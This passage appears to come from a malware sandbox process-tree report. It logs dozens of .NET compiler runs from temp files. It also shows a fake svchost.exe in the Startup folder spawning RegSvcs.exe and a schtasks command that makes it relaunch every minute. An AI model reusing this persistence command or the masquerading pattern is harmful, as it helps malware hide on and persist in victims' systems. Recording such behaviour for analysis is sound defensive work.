    PID:2340
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E0D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1DFD.tmp"
      4⤵
      PID:2784
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\4beya10n.cmdline"
    3⤵
    PID:2540
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1EB9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1EB8.tmp"
      4⤵
      PID:1708
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q_dhiynt.cmdline"
    3⤵
    PID:1784
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES202F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc201F.tmp"
      4⤵
      PID:432
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hvex9-0m.cmdline"
    3⤵
    PID:1672
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2177.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2166.tmp"
      4⤵
      PID:1588
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pacxaafg.cmdline"
    3⤵
    PID:680
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES22CE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc22BD.tmp"
      4⤵
      PID:2672
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cwsvsffw.cmdline"
    3⤵
    PID:2496
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2406.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2405.tmp"
      4⤵
      PID:324
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wusnnct_.cmdline"
    3⤵
    PID:1004
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES254E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc254D.tmp"
      4⤵
      PID:2732
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rv162ti8.cmdline"
    3⤵
    PID:2440
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES26C4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc26C3.tmp"
      4⤵
      PID:2856
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\5to9gvcd.cmdline"
    3⤵
    PID:2884
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES27BE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc27AD.tmp"
      4⤵
      PID:2864
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dcm2ja1x.cmdline"
    3⤵
    PID:1532
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES29D0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc29CF.tmp"
      4⤵
      PID:1156
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\_l0idw4y.cmdline"
    3⤵
    PID:1964
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2AF8.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2AF7.tmp"
      4⤵
      PID:432
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\a5zsu2rq.cmdline"
    3⤵
    PID:1092
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2CBD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2CBC.tmp"
      4⤵
      PID:2004
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\jnhvloxz.cmdline"
    3⤵
    PID:2040
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2F3C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2F3B.tmp"
      4⤵
      PID:2056
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ivnoilt2.cmdline"
    3⤵
    PID:1740
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3101.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc30F0.tmp"
      4⤵
      PID:1808
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ihjyw2at.cmdline"
    3⤵
    PID:2248
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES31CC.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc31CB.tmp"
      4⤵
      PID:2732
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ccz1gvhy.cmdline"
    3⤵
    PID:1388
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3304.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3303.tmp"
      4⤵
      PID:3004
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\iywpyqqk.cmdline"
    3⤵
    PID:1932
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES348A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3489.tmp"
      4⤵
      PID:2864
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ujjzku63.cmdline"
    3⤵
    PID:2596
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES361F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc360F.tmp"
      4⤵
      PID:2260
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fjzv4ho3.cmdline"
    3⤵
    PID:2540
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3786.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3785.tmp"
      4⤵
      PID:864
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kcpyzkyi.cmdline"
    3⤵
    PID:2396
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\f7i93ufo.cmdline"
    3⤵
    PID:2360
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
    3⤵
    PID:3064
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
      4⤵
      PID:2660
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        5⤵
        
        PID:1196
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qflyjsp-.cmdline"
        5⤵
        
        PID:2684
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA22A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA229.tmp"
        6⤵
        
        PID:1156
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\w2ee0gtp.cmdline"
        5⤵
        
        PID:1736
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA333.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA332.tmp"
        6⤵
        
        PID:2540
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kdfl0rzz.cmdline"
        5⤵
        
        PID:2736
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yqt2gde4.cmdline"
        5⤵
        
        PID:2348
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vkmn5kj3.cmdline"
        5⤵
        
        PID:2024
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA601.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA600.tmp"
        6⤵
        
        PID:2404
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rcjfgx_u.cmdline"
        5⤵
        
        PID:3048
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA739.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA738.tmp"
        6⤵
        
        PID:2968
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ge_bv1ib.cmdline"
        5⤵
        
        PID:2572
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA871.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA870.tmp"
        6⤵
        
        PID:2924
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\m8ra3ajj.cmdline"
        5⤵
        
        PID:2276
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\olnrsktr.cmdline"
        5⤵
        
        PID:544
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA45.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAA44.tmp"
        6⤵
        
        PID:1644
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\4wcasa-k.cmdline"
        5⤵
        
        PID:3016
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABEA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcABE9.tmp"
        6⤵
        
        PID:2864
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\f8ph4nna.cmdline"
        5⤵
        
        PID:1896
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESADBE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcADBD.tmp"
        6⤵
        
        PID:2684
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cvjzo22t.cmdline"
        5⤵
        
        PID:2016
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kepbi3h3.cmdline"
        5⤵
        
        PID:1952
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lxzx7ovy.cmdline"
        5⤵
        
        PID:1672
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB109.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB0D9.tmp"
        6⤵
        
        PID:2728
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rbok0l7h.cmdline"
        5⤵
        
        PID:288
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB31B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB31A.tmp"
        6⤵
        
        PID:680
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\t_ygtly6.cmdline"
        5⤵
        
        PID:2360
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB453.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB452.tmp"
        6⤵
        
        PID:1660
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wnxo3thj.cmdline"
        5⤵
        
        PID:2152
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5BA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB5B9.tmp"
        6⤵
        
        PID:2932
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pyshgjtu.cmdline"
        5⤵
        
        PID:184
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB721.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB720.tmp"
        6⤵
        
        PID:2072
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rzwjljda.cmdline"
        5⤵
        
        PID:2860
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qlsdwylm.cmdline"
        5⤵
        
        PID:1280
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB943.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB932.tmp"
        6⤵
        
        PID:2864
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gs_wxvve.cmdline"
        5⤵
        
        PID:2632
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBBA3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBBA2.tmp"
        6⤵
        
        PID:1144
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\jr3aeuog.cmdline"
        5⤵
        
        PID:984
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBCFA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBCF9.tmp"
        6⤵
        
        PID:1736
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-5ytnrt8.cmdline"
        5⤵
        
        PID:1900
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\_qxwj5_9.cmdline"
        5⤵
        
        PID:2056
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF6A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcBF69.tmp"
        6⤵
        
        PID:268
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\v3abshtu.cmdline"
        5⤵
        
        PID:2672
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dqfekd6z.cmdline"
        5⤵
        
        PID:1008
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1CB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC1CA.tmp"
        6⤵
        
        PID:2400
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\j9wjzx-a.cmdline"
        5⤵
        
        PID:944
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC332.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC321.tmp"
        6⤵
        
        PID:896
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zmqxbh89.cmdline"
        5⤵
        
        PID:1984
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC40C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC40B.tmp"
        6⤵
        
        PID:912
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1368
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\2nk7q_nx.cmdline"
        5⤵
        
        PID:544
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC525.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC524.tmp"
        6⤵
        
        PID:1664
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gnz6e5dx.cmdline"
        5⤵
        
        PID:2648
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC544.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC543.tmp"
        6⤵
        
        PID:2476
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3n4mciqw.cmdline"
        5⤵
        
        PID:1896
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\l_mhelru.cmdline"
        5⤵
        
        PID:864
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
